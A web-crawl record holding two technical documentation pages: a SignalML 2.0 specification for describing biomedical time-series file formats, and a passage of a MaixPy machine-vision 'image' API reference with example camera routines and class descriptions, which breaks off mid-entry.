{"ft_lang_label":"__label__en","ft_lang_prob":0.53621703,"math_prob":0.98216414,"size":913,"snap":"2021-21-2021-25","text_gpt3_token_len":374,"char_repetition_ratio":0.122112215,"word_repetition_ratio":0.11702128,"special_character_ratio":0.42606792,"punctuation_ratio":0.10300429,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9909289,"pos_list":[0,1,2,3,4,5,6,7,8],"im_url_duplicate_count":[null,null,null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-06-23T02:16:55Z\",\"WARC-Record-ID\":\"<urn:uuid:50ff6a8e-8433-4d26-ab70-b5cd56973949>\",\"Content-Length\":\"51344\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:47c48d90-585f-452b-b73d-3e6bf0cafcf6>\",\"WARC-Concurrent-To\":\"<urn:uuid:cb0c9326-cceb-4bf2-b451-1ef97c83d95d>\",\"WARC-IP-Address\":\"5.181.255.166\",\"WARC-Target-URI\":\"https://bestbasic.net/forum/viewtopic.php?f=4&t=34&sid=1a24b75095636cc9936bb746124dc49e\",\"WARC-Payload-Digest\":\"sha1:LUXOAQUX4ERHXHJWXUOVHOESLIQKQ5BN\",\"WARC-Block-Digest\":\"sha1:CMXONVW46HHIT6SPEVWIOLAXQPJHSBQS\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-25/CC-MAIN-2021-25_segments_1623488528979.69_warc_CC-MAIN-20210623011557-20210623041557-00108.warc.gz\"}"}
https://braintech.pl/software/svarog/signalml/?lang=en
[ "## Preamble\n\n• SignalML describes formats used for digital storage of (multivariate) biomedical time series.\n• SignalML is not a data format. Using SignalML description, data is read from the original files, without any conversion or file multiplication.\n• We can assume that SignalML does not have to provide a complete description of all the information contained in the data files, but it should describe its subset necessary and sufficient for a proper interpretation of the time series (e.g. display).\n• As one of the extensions from version 1.0, we allow the possibility of storing information about one recording in more than one file.\n\n## Describing data series\n\nThe content of data files can be divided into two logical parts\n\n1. The header containing meta-data—a description of the data contained in the file (sampling frequency, number of channels, electrode names, conversion constants, … and especially the format or physical layout of samples).\n2. The data part (raw numbers).\n\nInformation that is normally contained in a header, either at the begging of the single file, or in some file separate from the main data file, and is required to understand the bulk of data, is converted into a series of ‘parameters’. The recipe to find this information is given using `param` tags.\n\n`param` tags must be children of a `file` tag. In case of parameters to be read from a file, this implicitly specifies the file.\n\nParameters come in a few flavours:\n\n• either taking arguments (functions) or not (variables)\n• either evaluating an expression or reading data from a file\n\nIrrespective of the specific requirements described below for different flavours of parameters, for each parameter the following must be given:\n\n• name (the `id` attibute)\nThis must be a valid identifier as specified in #Identifiers. Identifiers of all parameters must be unique in one format description.\n• type (the `type` attibute)\nOne of the types defined in Variable types.\n\nThe parameters are constant and idempotent, i.e. their evaluation always returns the same value (for the same arguments, in case of functions), and subsequent evaluation has no side effects.\n\nAn evaluation of a parameter can require other parameters because of references from attributes and expressions. A directed graph of such requirements must not contain cycles. In other words, an application using a format description can start with any parameter and find its value evaluating other parameters as needed.\n\n#### Variables\n\nVariables are parameters which have a constant value— it can only depend on other parameters (which are constant) and data read from files, which are constant too.\n\nA parameter is a variable when it has no arguments defined.\n\n#### Functions\n\nFunctions are parameters which require arguments for evaluation. Their value is constant for each combination of arguments. In evaluating the function, arguments behave like local parameters with the value passed in the function call.\n\nA parameter is a function when it has at least one argument defined.\n\nAn argument is specified with a name and a type. Arguments are specified as child `tag` nodes of the `param` node defining the function. Each `arg` must have the following attributes:\n\n• `name`\n• `type`\n\nArgument names must be unique within the function and they must be valid identifiers.\n\nWhen the value of the parameter should be read from a file, child tags specify how to read this value must be given. What attributes are necessary depends on the type of file and is described in The data part.\n\nThis type of parameters cannot contain the `expr` child.\n\n#### Evaluating parameters\n\nParameters whose value is to be calculated from other parameters, (or is a numerical constant), can specify one of the following. Either it can have the child `<expr>` node, whose contents are then evaluated according to the rules in Expressions.\n\n#### Standard parameters\n\nParameters listed below have a specified meaning. Some parameters are prerequisite for understanding/interpretation of the (multivariate) time series data. When there is no default value that can be assumed to be usually right, then they are required to be present in each format description. They can be evaluating or not.\n\nIt is preferable to describe the information present in each format as completely as possible, but this might not be feasible, and is not required for basic interpretation. Therefore, we define a minimum set of parameters:\n\nnumber_of_channels [required]\nThe width of each sample, that is, number of time series (channels, derivations) recorded simultaneously.\nType: int\nmapping(channel, sample) [required]\nThe mapping specifying the layout of data. See #Mapping Mapping.\nType: int\nsampling_frequency(channel) [optional]\nThe sampling frequency of the given channel.\nType: float\nUnits required\ncalibration_gain(channel) [optional]\nConstant by which numbers from file are multiplied to get a physical value.\nType: float\nDefault value: 1\nSee #Calculating sample value.\ncalibration_offset(channel) [optional]\nConstant by which numbers from file are diminished to get a physical value.\nType: float\nDefault value: 0\nSee #Calculating sample value.\ncalibration_units(channel) [optional]\nPhysical units which this channel uses (usually μV or fT).\nType: string\nThis string is understood as described in #Parsing units.\nsamples_in_file(channel) [optional]\nThe length of the time series in samples, for the given channel. In case of most formats, the result does not depend on the channel number, and the function argument can be ignored. EDF is one of the rare formats where each channel can have a different number of samples, and the function argument is necessary.\nIf this parameter is not defined, the only way to know the number of samples is from file size.\nType: int\nchannel_name(channel) [optional]\nName of each channel.\nType: string\nDefault value: Lchannel where channel is substituted with the function argument.\n\n#### Calculating sample value\n\nSamples are often stored after a linear transformation. Therefore, two standard parameters are specified, which are then used to calculate the real value of a sample.\n\n``````\nfinal_value(channel, sample) =\n(sample_as_stored_in_file(channel,sample) - calibration_offset(channel))\n* calibration_gain(channel)\n```\n```\n\nNeither of the two parameters must be defined. They have default values 0 and 1, which means that the above formula defaults to\n\n``````\nfinal_value(channel, sample) = sample_as_stored_in_file(channel,sample)\n```\n```\n\n### The data part\n\n#### File types\n\nSignalML 2.0 can describe formats where data is stored in files of one of the following types:\n\n• Fixed position\n• XML\n• Free text\n##### Fixed-position files\n\nFiles based on fields whose width is defined a priori, so that some field can be located by seek()ing on the file and read()ing from a known location, are called in this document fixed-position files. They are also commonly called ‘binary’ files, but this is imprecise: e.g. EDF contains constant-width, fixed-position data formatted as ASCII strings, therefore not binary.\n\nTo retrieve a field present in a file of this type, the following data is necessary:\n\ninput format\nThis describes how the data is stored in the file, or more precisely, how many bytes are used, and how they should be interpreted.\nThis description is understood using the rules of a dtype definition, as defined in the NumPy array interface.\noutput type\nWhatever is read, is converted to this type. It must be one of the types defined in #variable_types.\nIf output type is not specified, it defaults to the same generic type as the input format, albeit without explicit width for int and float types.\nposition in file\nThis tells where in the file this variable is located. It is the offset from the begging of file in bytes.\n\nThis file type is specified by `<file type='binary'>`.\n\n##### XML files\n\nXML files are used more often for headers rather than data, but it is certainly possible to use XML for storage of both data parts. No validation is performed.\n\nTo retrieve a variable in an XML file the following information is necessary:\n\noutput type\nThe same as in fixed-offset files.\nlocation specified as an XPath\nThis xpath is used to retrieve some string-value, which is in turn interpreted as a text representation of the output type.\n\nThis file type is specified by `<file type='XML'>`.\n\n##### Text files\n\nText files are composed of ‘lines’ separated by end-of-line markers, which in turn are divided into ‘fields’, and the position of n-th sample can only be found by sequential parsing.\n\nBecause there are many, many different formats of text files, we do not define the precise format. Instead, the file is split into lines using the end-of-line marker, defined as a regular expression.\n\nEach line can be split into fields, using a seperator regexp, defined as the attribute `split` on the file.\n\nTo retrieve a variable one of the following must be used:\n\n###### Line number and field number\n``````\n<file split=\"/ +/\"> (split at whitespace)\n(extract third field on the first line)\n<param id=\"number_of_channels\" line=\"1\" field=\"3\" />\n```\n```\n###### Line number and a regexp to extract the variable value\n\nThe regexp must be written in such a way, that the one and only capturing group matches the value.\n\n``````\n(a string after the first colon in the first line)\n<param id=\"number_of_channels\" line=\"1\" match=\"/^[^:]*:(.+)\\$/\" />\n```\n```\n###### A regexp that matches against the whole file\n\nThe regexp must be written in such a way, that the one and only capturing group matches the value.\n\n``````\n(a line that starts with MSI.TotalChannels, part after colon)\n<param id=\"number_of_channels\" line=\"any\"\nmatch=\"/^MSI.TotalChannels:\\s*(\\d+)\\s*\\$/\" />\n```\n```\n\nThis file type is specified by `<file type='text'>`.\n\n#### Data tag and offset and file mapping\n\nThe presence of data in a file is signified by a `<data>` tag. There must be no more than one tag of this kind, but no data can be extracted from a format unless there is at least one. The file in which the data is contained can be specified either explicitly or implicitly.\n\nIf the element contains an attribute `file`, then this must be a name of a parameter giving the ID of file to use. IDs of files are specified through the `id` attribute. If follows, that if the attribute was not used for a file, it cannot be explicitly referenced in this way.\n\nIf the `file` attribute of the `<data>` element is not used, the `<data>` element must be nested inside a `<file>` element. The enclosing file is then implicitly taken to be the file containing the data.\n\nThe layout of data is specified through a function given through the `offset` attribute. The function must return the position (offset in bytes from the begging of file) of the requested measurement.\n\nFor example, for file called `test.dat` with multiplexed data, one could write\n\n``` <file name='test.dat'>\n<data offset='multiplex_mapping'>\n<param 'multiplex_mapping'> … </param>\n</file>\n```\n\nThe parameter specified through the `file` and `offset` attributes must be functions taking two `int` arguments, specifying sample and channel number, starting from 0.\n\n##### Example: multiplexed\n\nMultiplexed samples are arranged as\n(sample0:channel0 sample0:channel1 …\nsample1:channel0 sample1:chanenl1 …\nsampleN:channel0 sampleN:channel1 … sampleN:channelM)\n\nThe relevant mapping function is\n\n```<param id='mapping' type='int'>\n<arg name='channel' type='int'> (channel number)\n<arg name='sample' type='int'> (sample number)\n<expr>\n(sample * number_of_channels + channel) * datatype_width + header_size\n</expr>\n</param>\n```\n##### Example: EDF\n\nSamples are aranged in frames. To understand the layout, a helper parameter is used, `channel_offset(channel)`, which specifies how far into each frame this channels data is stored. Another helper parameter used, `frame_size` specifies the size of each frame in bytes.\n\nThe relevant mapping function is\n\n``` <param id='mapping' type='int'>\n<arg type='int' name='channel' />\n<arg type='int' name='sample' />\n<expr>\nsample//samples_per_frame(channel) * frame_size +\nchannel_offset(channel) +\nsample%samples_per_frame(channel) * datatype_width\n</expr>\n</param>\n<param id='channel_offset' type='int'>\n<arg type='int' name='channel' />\n<expr>\nchannel == 0 ? 0 :\nchannel_offset(channel-1) + samples_per_frame(channel-1) * datatype_width\n</expr>\n</param>\n<param id='frame_size' type='int'>\n<expr>channel_offset(number_of_channels + 1)</expr>\n</param>\n```\n\n#### Accessing files\n\nFiles are referenced through `<file>` elements.\n\nSometimes the file name is empty, i.e. an `str` with length 0, or simply not specified (in case of files defined through `<file>` elements). The application can cope with this situation in two ways:\n\n1. If it is the ‘main’ file, then the standard sequence of events is such, that the user specifies some filename to open, and this filename is used for the ‘main’ file.\n2. If the filename wasn’t specified, the user can be queried or an error can be signaled.\n\n## Standard functions\n\nThe following functions are defined by the specification and are available in all SignalML implementations.\n\n#### Exponential functions\n\n`log(x)` returns logex\n`log(x)` returns log10x\n`exp(x)` returns ex\n`factorial(x)` returns x!\n\n#### Trigonometric functions\n\nThe argument is interpreted as an angle in radians.\n\n`sin(x)` returns sinx\n`cos(x)` returns cosx\n`tan(x)` returns tanx\n`cot(x)` returns cotx\n\n#### String functions\n\n`strip(s)` returns the string with whitespace removed from the begging and end. To be considered whitespace, characters must be defined so in Unicode.\n\n`split(s, sep)` returns an list of words in the string `s`, using `sep` as seperator.\n\n#### Special functions\n\n`protocol_version` gives the SignalML version?\n\n`throw(message)` is used to return an error to the application. The `message` is a string intended to be understood by the user that describes the error.\n\n## Variable types\n\nVariable types are used for output from the codec to the surrounding application.\n\nThe following types are defined:\n\n int a signed integral number float a floating-point number bool a boolean variable str an array of Unicode characters bytes an array of one-byte characters\n\nThese types are based on Python. However, they are not required to have unlimited range. It is at implementations discretion to use native integer or float types of sufficient range.\n\nAdditionally, arrays can be defined as int[], float[], etc. The length of the array is not defined at the time of declaration.\n\nThose types are defined to describe how the application communicates with the codec at the logical level. However, the implementation defines what native types are used, and e.g. the data declared as float can be really present in memory as float, but the sampling frequency, also declared as float, can be stored in memory as a double float.\n\n## Expressions\n\nExpressions are used in a number of places:\n\n1. In evaluating parameters — value of the parameter is found by executing the expression contained in an `<expr>` node.\n2. Some attributes are interpreted as expressions and executed.\n\nThe interpretation of an expression is roughly based on Python syntax and evaluation rules, including precedence.\n\nExpressions can contain parameter references — variable references and function calls. A name used in an expression, will, in order or precedence,\n\n1. refer to a local argument name (in a function),\n2. refer to a parameter,\n3. refer to a built-in parameter,\n4. cause a failure.\n\n#### variable references\n\n````some_name`\n```\n\n#### function calls\n\n````some_func(param1, param2)`\n```\n\n#### constants\n\n• integral numbers (e.g. `123`)\n• floating-point numbers (e.g. `23.12`)\n• numbers with an explicit radix (e.g. `0x200`, `0o755`, `0b00110011`)\n\n#### operators\n\n• `+` (addition), `-`(subtraction), `*`(multiplication)\n• `/` (division) and `//` integral division\n• `%` (modulo)\n• `==`, `<`, `<=`, `>=`, `>`, `!=` (comparisons)\n• `&` (bitwise and), `|` (bitwise or), `^` (bitwise exclusive or), `<<` (bitwise left shift), `>>` (bitwise right shift)\n• `[start:stop:stride]` (slicing)\n• `predicate?if-true:if-false` (ternary operator)\n• `and`, `or`, `not`, `xor` (logical operators)\n\n#### identifiers\n\nParameter references and function calls are performed through identifiers. Identifiers must satisfy the regexp `/[a-zA-Z_][a-zA-Z_0-9]*/`, that is be acceptable identifiers in Python, C, Java…\n\n#### Example: multiplex\n\nThe offset of multiplexed channel sample in a binary file can be written as\n\n```(number_of_channels * sample_number + channel_number) * datatype_width\n```\n\n## Units\n\nTo attach physical units to some parameter the attribute `units=` must be used.\nE.g., to specify a sampling frequency of 100 Hz, one could use\n\n``` ```\n<param id='sampling_frequency' units='Hz'>\n<expr>100</expr>\n</param>\n```\n```\n\nEach parameter is one of the following states in respect to units:\n\n• undefined – an operation was performed which makes no sense when using units\n• with units – some unit is attached to the parameter\n• unitless – a special case of the above, the parameter is a scalar in units of 1.\n\nOnce a unit is set, it propagates according to the following rules (in order of importance)\n\n1. Explicitly setting units with the attribute overrides other rules.\n2. The result of a bit operation is unitless.\n3. The result of any operation with an operand in undefined unit state is in undefined unit state.\n4. The result of `*` or `/` is in the product or quotient of units of operands.\n5. The result of `+`, `-`, `%`, `//` is in the same units as either operand if they are in the same units, or undefined if they are not.\n6. The result of comparison operators is unitless if the operands are in the same units, or undefined if the are not.\n7. The result of slicing is in the same units as the slicee.\n\n### Parsing units\n\nThe string specifying units must be written as a space- (for multiplication) and slash- (for division) and double star- (`**`, for raising to a power) -separated sequence of unit symbols. The precedence of those operators is the same as in expressions.\n\nBase units and prefixes must be used as specified by Bureau International des Poids et Mesures\n\nGreek letters in prefixes and other special letters must be written as-is, using an appropriate encoding (preferably some Unicode serialization) or entity references.\n\nUnits should be specified as a product or a quotient only where the unit has no commonly accepted symbol.\n\nExamples:\n\n1. μV or mV or V for microvolt or millivolt or volt\n2. fT for femtotesla\n3. Ã… or nm or μm for angstrom or nanometer or micrometer\n4. m T/s for meter tesla per second (whatever that is)\n5. m**3 for cubic meters\n\n## Verification\n\nVerification of a SignalML format description can be performed on multiple levels:\n\n1. concordance with the corresponding XMLSchema.\nThe canonical location of the schema is http://signalml.org/SignalML_2_0.xsd\n2. syntactic correctness of the algebraic expressions (contained within attributes, `expr` tags).\n3. conformance to other requirements set in this specification:\n1. all required parameters are defined\n2. expression don’t reference non-existent parameters\n3. parameters have required types\n4. successful execution of the actual data reading and evaluation operations (runtime correctness)\n5. fulfillment of the assertions specified in format description as `assert`s.\n\nPoints one and two and three depend only on the format description. Not satisfying points four or five however, can be caused by errors in the description or by the data-files not conforming to the description.\n\n## XML structure\n\n```<?xml version=\"1.0\"?>\n<format>\n<format id='PE-EASYS'/>\n\n<file extension='*.d' type='binary' >\n<param id='datatype_width'>\n<expr>4</expr>\n</param>\n<param id='mapping' type='int'>\n<expr>(number_of_channels * sample_number + channel_number) *\ndatatype_width + 16 * data_offset\n</expr>\n</param>\n\n<param id='magic'>\n<format>|S3</format>\n<offset>0</offset>\n</param>\n<assert id='magic_ok'>\n<expr>magic == \"EAS\"</expr>\n</assert>\n\n<param id='number_of_channels'>\n<format>>i1</format>\n<offset>16</offset>\n</param>\n\n<param id='sampling_frequency' type='float' units='Hz'>\n<expr>_sampling_frequency/100</expr>\n</param>\n<param id='_sampling_frequency'>\n<format>>i4</format>\n<offset>18</offset>\n</param>\n\n<param id='calibration_gain' type='float' units='μV'>\n<expr>_calibration_gain/100</expr>\n</param>\n<param id='_calibration_gain'>\n<format>>i1</format>\n<offset>25</offset>\n</param>\n\n<param id='data_offset'>\n<format>>i2</format>\n<offset>28</offset>\n</param>\n</file>\n</format>\n```\n\nAllowed values of the `type` parameter (type of the file)\n\n ‘binary’ fixed-position with IEEE floating/fixed point ‘xml’ XML file ‘ascii’ an ASCII format\n\n## Format ID\n\nIt would be good to have a well defined formula for the identification and naming the very format, read/defined by the codec. For example, something like in the XML Schemas–a given URI. So for EDF that might be “http://www.edfplus.info/specs/edf.html“–some groups, organizations or companies might like to adhere to this kind of scheme, but even if not, the application might use this ID to create a list of handled formats and group codecs for each of them.\n\nFor this, each codec should return some text info, useful for presenting to the user, e.g.:\n\n• company/organization promoting given data format\n• name of the format\n• version of the format\n\n## Codec ID\n\nIt would be also good to have a unique formula for the identification/description of a codec, including e.g.:\n\n• data format which it describes/defines (e.g. the URI from the above example)\n• unique name of the codec(s) provider (sth. like the above URI, or Java packets notations, in which case EASYS codec that we create and maintain would be org.signalml.EASYS — with absolutely no relation to the Java class which implements it)\n• version number\n\nApplication should not allow to simultaneous installation of two versions of the same codec (according to the above criteria)—such an attempt should be processed as an upgrade.\n\nCurrently, the signalml application uses for this hash of the XML file, from which the codec was created: that’s a bit unnatural, and, in general, a codec does not have to originate from an XML file to be functional.\n\n### Magic\n\nFrom the side of application and users, it would be great to include some kind of “AI” guessing and suggesting the right format/codec based upon the file name and content. So, for the formats that include some kind of “magic” identification fields, we could include this information in the above description/ID." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.78151137,"math_prob":0.8099035,"size":22887,"snap":"2020-45-2020-50","text_gpt3_token_len":5180,"char_repetition_ratio":0.14333785,"word_repetition_ratio":0.032330617,"special_character_ratio":0.22711582,"punctuation_ratio":0.10483473,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.95371175,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-10-22T05:50:53Z\",\"WARC-Record-ID\":\"<urn:uuid:7497e7b5-1611-4b77-9f1f-07b154594b9c>\",\"Content-Length\":\"108940\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:3631a84f-ed51-4e88-84f9-4fe4da890e84>\",\"WARC-Concurrent-To\":\"<urn:uuid:b75acce8-37ce-40f8-b7a9-27d6b410cb9c>\",\"WARC-IP-Address\":\"104.28.26.47\",\"WARC-Target-URI\":\"https://braintech.pl/software/svarog/signalml/?lang=en\",\"WARC-Payload-Digest\":\"sha1:55BWKGOWCX2RQPSPDPXXSNEJL5RQ3CBZ\",\"WARC-Block-Digest\":\"sha1:UEGGRIQGTCDYAIEC7H6LMRJ74CB3NKQZ\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-45/CC-MAIN-2020-45_segments_1603107878921.41_warc_CC-MAIN-20201022053410-20201022083410-00117.warc.gz\"}"}
https://maixpy.sipeed.com/en/libs/machine_vision/image.html
[ "# Image — machine vision\n\nPorted in `openmv`, same as `openmv`\n\n## 1. Routine\n\n### 1.1. Routine 1: Find green\n\n``````import sensor\nimport image\nimport lcd\nimport time\nlcd.init()\nsensor.reset()\nsensor.set_pixformat(sensor.RGB565)\nsensor.set_framesize(sensor.QVGA)\nsensor.run(1)\ngreen_threshold = (0, 80, -70, -10, -0, 30)\nwhile True:\nimg=sensor.snapshot()\nblobs = img.find_blobs([green_threshold])\nif blobs:\nfor b in blobs:\ntmp=img.draw_rectangle(b[0:4])\ntmp=img.draw_cross(b, b)\nc=img.get_pixel(b, b)\nlcd.display(img)\n``````\n\n### 1.2. Routine 2: Display fps\n\n``````import sensor\nimport image\nimport lcd\nimport clock\n\nclock = clock.clock()\nlcd.init()\nsensor.reset()\nsensor.set_pixformat(sensor.RGB565)\nsensor.set_framesize(sensor.QVGA)\nsensor.run(1)\nsensor.skip_frames(30)\nwhile True:\nclock.tick()\nimg = sensor.snapshot()\nfps =clock.fps()\nimg.draw_string(2,2, (\"%2.1ffps\" %(fps)), color=(0,128,0), scale=2)\nlcd.display(img)\n``````\n\n### 1.3. Routine 3: Scan QR code\n\n``````import sensor\nimport image\nimport lcd\nimport clock\n\nclock = clock.clock()\nlcd.init()\nsensor.reset()\nsensor.set_pixformat(sensor.RGB565)\nsensor.set_framesize(sensor.QVGA)\nsensor.set_vflip(1)\nsensor.run(1)\nsensor.skip_frames(30)\nwhile True:\nclock.tick()\nimg = sensor.snapshot()\nres = img.find_qrcodes()\nfps =clock.fps()\nif len(res) > 0:\nlcd.display(img)\n``````\n\nIf the lens is used, the picture will be distorted and the picture needs to be corrected. Use the `lens_corr` function to correct, such as `2.8`mm, `img.lens_corr(1.8)`\n\n## 2. function\n\nThe function can also press `Ctrl+F` on the page to search for functions using the browser's search function search `image.`\n\n### 2.1. image.rgb_to_lab(rgb_tuple)\n\nReturns the tuple (l, a, b) of the LAB format corresponding to the tuple rgb_tuple (r, g, b) in RGB888 format.\n\nRGB888 refers to 8 bits (0-255) of red, green and blue. In LAB, L has a value range of 0-100, and a/b ranges from -128 to 127.\n\n### 2.2. image.lab_to_rgb(lab_tuple)\n\nReturns the tuple (r, g, b) of the RGB888 format corresponding to the tuple lab_tuple (l, a, b) in LAB format.\n\nRGB888 refers to 8 bits (0-255) of red, green and blue. In LAB, L has a value range of 0-100, and a/b ranges from -128 to 127.\n\n### 2.3. image.rgb_to_grayscale(rgb_tuple)\n\nReturns the gray value corresponding to the tuple rgb_tuple (r, g, b) in RGB888 format.\n\nRGB888 refers to 8 bits (0-255) of red, green and blue. The gray value is from 0 to 255.\n\n### 2.4. image.grayscale_to_rgb(g_value)\n\nReturns the tuple (r, g, b) of the RGB888 format corresponding to the gray value g_value.\n\nRGB888 refers to 8 bits (0-255) of red, green and blue. The gray value is from 0 to 255.\n\nLoad a descriptor object from the disk.\n\nPath is the path where the descriptor file is saved.\n\n### 2.6. image.save_descriptor(path, descriptor)\n\nSave the descriptor object descriptor to disk.\n\nPath is the path where the descriptor file is saved.\n\n### 2.7. image.match_descriptor(descritor0, descriptor1[, threshold=70[, filter_outliers=False]])\n\nFor the LBP descriptor, this function returns an integer that represents the difference between the two descriptors. This distance measurement is especially necessary. This distance is a measure of similarity. The closer this measure is to 0, the better the LBPF feature points will match.\n\nFor the ORB descriptor, this function returns the kptmatch object. See above.\n\nThreshold is used to filter the ambiguous matching service for the ORB keypoint. A lower threshold value will be tied to the keypoint matching algorithm. The threshold value is at 0-100 (int). The default is 70.\n\nFilter_outliers is used to filter outliers for ORB keypoints. Feature points allow the user to increase the threshold value. The default setting is False.\n\n## 3. HaarCascade Class – Feature Descriptors\n\nThe Haar Cascade feature descriptor is used for the `image.find_features()` method. It has no methods for the user to call.\n\n### 3.1. Constructor\n\nThe stage default is the number of stages in Haar Cascade. However, you can specify a lower value to speed up the running of the feature detector, which of course leads to a higher false positive rate.\n\nA: Haar Cascade is a series of comparison checks used to determine if an object is present in an image. This series of comparison checks is divided into phases, and the operation of the latter phase is premised on the completion of the previous phase. Contrast checks are not complicated, but are like processes that check if the center of the image is slightly more vertical than the edges. A wide range of inspections are carried out first in the early stages, and more small area inspections are carried out later.\n\nA: Haar Cascades trains generator algorithms with positive and negative images. For example, use hundreds of pictures containing cats (marked as containing cats) and hundreds of pictures that do not contain cats (have been marked differently) to train this generation algorithm. This generation algorithm will eventually generate a Haar Cascades for detecting cats.\n\n## 4. Similarity Class – Similarity Object\n\nThe similarity object is returned by `image.get_similarity`.\n\n### 4.1. Constructor\n\nClass image.similarity\n\nCall the image.get_similarity() function to create this object.\n\n#### 方法\n\n##### similarity.mean()\n\nReturns the mean of the similarity difference in 8x8 pixel block structure. Range [-1/+1], where -1 is completely different and +1 is identical.\n\nYou can also get this value via index .\n\n##### similarity.stdev()\n\nReturns the standard deviation of the 8x8 pixel block structure similarity difference.\n\nYou can also get this value via index .\n\n##### similarity.min()\n\nReturns the minimum value of the 8x8 pixel block structure similarity difference. Where -1 is completely different and +1 is identical.\n\nYou can also get this value via index .\n\nBy looking at this value, you can quickly determine if any 8x8 pixel blocks between the two images are very different, which is much lower than +1.\n\n##### similarity.max()\n\nReturns the minimum value of the 8x8 pixel block structure similarity difference. Where -1 is completely different and +1 is identical.\n\nYou can also get this value via index .\n\nBy looking at this value, you can quickly determine if any 8x8 pixel blocks between the two images are the same. That is much larger than -1.\n\n## 5. Histogram Class – Histogram Object\n\nThe histogram object is returned by `image.get_histogram`. A grayscale histogram has a channel that contains multiple binaryes. All binaries are normalized to a total of one. RGB565 has three channels with multiple binary. All binaries are normalized to a total of one.\n\n### 5.1. Constructor\n\nClass image.histogram\n\nPlease call the `image.get_histogram()` function to create this object.\n\n### 5.2. 方法\n\n#### histogram.bins()\n\nReturns a list of floating point numbers for the grayscale histogram. You can also get this value via index .\n\n#### histogram.l_bins()\n\nReturns a list of floating point numbers for the L channel of the RGB565 histogram LAB. You can also get this value via index .\n\n#### histogram.a_bins()\n\nReturns a list of floating point numbers for the A channel of the RGB565 histogram LAB. You can also get this value via index .\n\n#### histogram.b_bins()\n\nReturns a list of floating point numbers for the B channel of the RGB565 histogram LAB. You can also get this value via index .\n\n#### histogram.get_percentile(percentile)\n\nCalculates the CDF of the histogram channel, returning a value that passes the histogram in percentile (0.0 - 1.0) (floating point).\n\nTherefore, if you pass in 0.1, this method will tell you which binary will cause the accumulator to cross 0.1 when accumulating the accumulator.\n\nThis is effective for determining the minimum (0.1) and max(0.9) of the color distribution when there is no anomalous utility to corrupt your adaptive color tracking results.\n\n#### histogram.get_threhsold()\n\nUse the Otsu’s method to calculate the optimal threshold, dividing each channel of the histogram into two halves. This method returns an image.threshold object. This method is especially useful for determining the best image.binary() threshold.\n\n#### histogram.get_statistics()\n\nCalculates the mean, median, value, standard deviation, minimum, maximum, lower quartile, and upper quartile for each color channel in the histogram and returns a statistics object. You can also use histogram.statistics() and histogram.get_stats() as aliases for this method.\n\n## 6. Percentile Class – Percentage Value Object\n\nThe percentage value object is returned by `histogram.get_percentile`. The grayscale value has one channel. Do not use the l* , a , or b_ methods. The RGB565 percentage value has three channels. Use the l* , a , and b_ methods.\n\n### 6.1. Constructor\n\nClass image.percentile\n\nCall the histogram.get_percentile() function to create this object.\n\n### 6.2. 方法\n\n#### percentile.value()\n\nReturns the grayscale percentage value (value range 0-255).\n\nYou can also get this value via index .\n\n#### percentile.l_value()\n\nReturns the percentage value of the L channel of the RGB565 LAB (value range is 0-100).\n\nYou can also get this value via index .\n\n#### percentile.a_value()\n\nReturns the percentage value of the A channel of the RGB565 LAB (value range -128-127).\n\nYou can also get this value via index .\n\n#### percentile.b_value()\n\nReturns the percentage value of the B channel of the RGB565 LAB (value range -128-127).\n\nYou can also get this value via index .\n\n## 7. Threhsold Class – Threshold Object\n\nThe threshold object is returned by histogram.get_threshold.\n\nThe grayscale image has a channel. There are no l*, a, and b_ methods.\n\nThe RGB565 threshold has three channels. Use the l*, a, and b_ methods.\n\n### 7.1. Constructor\n\nClass image.threshold\n\nCall the histogram.get_threshold() function to create this object.\n\n#### threhsold.value()\n\nReturns the threshold of the grayscale image (between 0 and 255).\n\nYou can also get this value via index .\n\n#### threhsold.l_value()\n\nReturns the L threshold in RGB565 map LAB (between 0 and 100).\n\nYou can also get this value via index .\n\n#### threhsold.a_value()\n\nReturns the A threshold in the RGB565 graph LAB (between -128 and 127).\n\nYou can also get this value via index .\n\n#### threhsold.b_value()\n\nReturns the B threshold in RGB565 map LAB (between -128 and 127).\n\nYou can also get this value via index .\n\n## 8. class Statistics – Statistics Object\n\nThe statistics object is returned by histogram.get_statistics or image.get_statistics.\n\nGrayscale statistics have one channel, using non-l*, a, or b_ methods.\n\nThe RGB565 percentage value has three channels. Use the l* , a , and b_ methods.\n\n### 8.1. Constructor\n\nClass image.statistics Call the histogram.get_statistics() or image.get_statistics() function to create this object.\n\n### 8.2. 方法\n\n#### statistics.mean()\n\nReturns the grayscale mean (0-255) (int).\n\nYou can also get this value via index .\n\n#### statistics.median()\n\nReturns the gray value median (0-255) (int).\n\nYou can also get this value via index .\n\n#### statistics.mode()\n\nReturns the gray level value (0-255) (int).\n\nYou can also get this value via index .\n\n#### statistics.stdev()\n\nReturns the gray standard deviation (0-255) (int).\n\nYou can also get this value via index .\n\n#### statistics.min()\n\nReturns the minimum gray level (0-255) (int).\n\nYou can also get this value via index .\n\n#### statistics.max()\n\nReturns the grayscale maximum (0-255) (int).\n\nYou can also get this value via index .\n\n#### statistics.lq()\n\nReturns the quarter value (0-255) (int) under gray.\n\nYou can also get this value via index .\n\n#### statistics.uq()\n\nReturns the grayscale upper quartile (0-255) (int).\n\nYou can also get this value via index .\n\n#### statistics.l_mean()\n\nReturns the mean (0-255) (int) of L in RGB5656 LAB.\n\nYou can also get this value via index .\n\n#### statistics.l_median()\n\nReturns the median (0-255) (int) of L in RGB5656 LAB.\n\nYou can also get this value via index .\n\n#### statistics.l_mode()\n\nReturns the value of L (0-255) (int) in RGB5656 LAB.\n\nYou can also get this value via index .\n\n#### statistics.l_stdev()\n\nReturns the standard deviation value (0-255) (int) of L in RGB5656 LAB.\n\nYou can also get this value via index .\n\n#### statistics.l_min()\n\nReturns the minimum value (0-255) (int) of L in RGB5656 